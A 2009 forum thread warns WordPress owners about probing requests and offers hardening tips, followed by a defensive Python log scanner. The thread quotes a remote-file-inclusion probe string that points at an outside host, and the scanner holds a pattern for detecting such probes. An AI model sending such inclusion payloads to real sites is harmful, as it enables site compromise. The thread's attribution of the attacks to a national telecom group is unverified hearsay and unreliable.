Just a heads up for WordPress users

Discussion in 'Programming' started by redthehat, Nov 19, 2009.

  1. #1
    This is the closest topic I could find; if it's the wrong place, then please move accordingly.

    I have noticed several times over the last few days that one of my sites has been repeatedly visited by someone using a random string, which definitely made me think that someone is trying to SQL inject the site. The string ended in "/errors.php?error=http://40-crew.com/media/id1.txt??"

    I don't know much about this kind of thing apart from how to repeatedly ban IPs from WordPress as they spawn up (probably using Tor), but thought I would share this with everyone, just so that everyone who uses WordPress can be aware of this one.
     
    redthehat, Nov 19, 2009 IP
  2. ilook
    #2
    ilook, Nov 20, 2009 IP
  3. redthehat
    #3
    From the reading around that I have done, it seems like this is an exploit that has been around for a very long time; hacks have been successful since as far back as 2007 using SQL injection. There was a group based in Pakistan that were known for doing this to people's blogs; they would also delete the 1 account from the MySQL database, and completely replace the WordPress files with outdated files as well. It was an easy fix, but it seems that there are reports of the same people being at it again.

    Every hack that I have read about that fits this description and string matches a group who always trace back to the Pakistani Telecommunications Company. They haven't been doing much for the past few years, but they seem to have resurfaced over the past 3 weeks. I have added some extra security to my WP, but yeah, last time these guys started messing with people, a hell of a lot of people lost their blogs, and had to do a hell of a lot of work. If these guys are back, then it may be a problem for those who are using WordPress. As a precaution, I have temporarily banned all IP addresses from the Pakistani Telecommunications Company, until I can make sure that my blog is locked up extremely tight.

    A few very brief precautions:

    1. Make sure that your WP is updated.
    2. Check your CHMOD permissions.
    3. Change your MySQL prefix so that it differs from wp_. Make it cryptic, and treat it like a password.
    4. Check that your server is secure.
    5. Don't upload any files from your computer for plugins unless your computer is protected.

    Just a few pointers. :)
     
    redthehat, Nov 20, 2009 IP
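    As an added example (not posted by anyone in this thread and not part of WordPress), here is a small Python script that does the log-side check a site owner would want before banning IPs: it parses web server access log lines in the common combined format and flags any request where a query parameter value is itself a remote URL, which is exactly the shape of the string redthehat quoted (`errors.php?error=http://40-crew.com/media/id1.txt??`). The log lines, the IP addresses and the theme path are constructed sample data, not real traffic.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache/Nginx "combined" log format (not real traffic).
# The first line reproduces the probe string quoted in the thread; the theme path
# and all IP addresses (RFC 5737 documentation ranges) are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Nov/2009:10:01:22 +0000] "GET /wp-content/themes/example/errors.php?error=http://40-crew.com/media/id1.txt?? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Nov/2009:10:02:03 +0000] "GET /?p=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2009:10:02:40 +0000] "GET /index.php?page=ftp://example.net/x.txt HTTP/1.1" 404 210 "-" "curl/7.19"
192.0.2.9 - - [19/Nov/2009:10:03:11 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.example/wp-login.php" "Mozilla/5.0"
"""

# One regex for the fields we care about in a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A parameter value that starts with a URL scheme followed by "://" is the
# signature of a remote-file-inclusion style probe: the request is asking the
# script to fetch and use a file hosted somewhere else.
REMOTE_URL_RE = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)


def parse_log_line(line):
    """Return a dict with ip, ts, method, target, status; None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_remote_url_params(target):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    query = urlsplit(target).query
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(value)]


def scan_log(text):
    """Scan raw log text and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue  # skip malformed lines rather than failing the whole run
        for name, value in find_remote_url_params(entry["target"]):
            findings.append({
                "ip": entry["ip"],
                "ts": entry["ts"],
                "path": urlsplit(entry["target"]).path,
                "param": name,
                "value": value,
                "status": entry["status"],
            })
    return findings


def hits_per_ip(findings):
    """Count flagged requests per client IP, which is what a ban decision is based on."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['ts']} {f['ip']} {f['path']} ?{f['param']}={f['value']} -> {f['status']}")
    print("hits per IP:", dict(hits_per_ip(results)))
```

    Run it against a real log with `scan_log(open("access.log").read())`. The status column matters: a 200 on such a request means the script answered the probe and deserves a closer look, whereas a 404 only tells you someone is scanning. Counting hits per IP gives a defensible basis for the kind of temporary bans described above, without blocking an entire provider's address range.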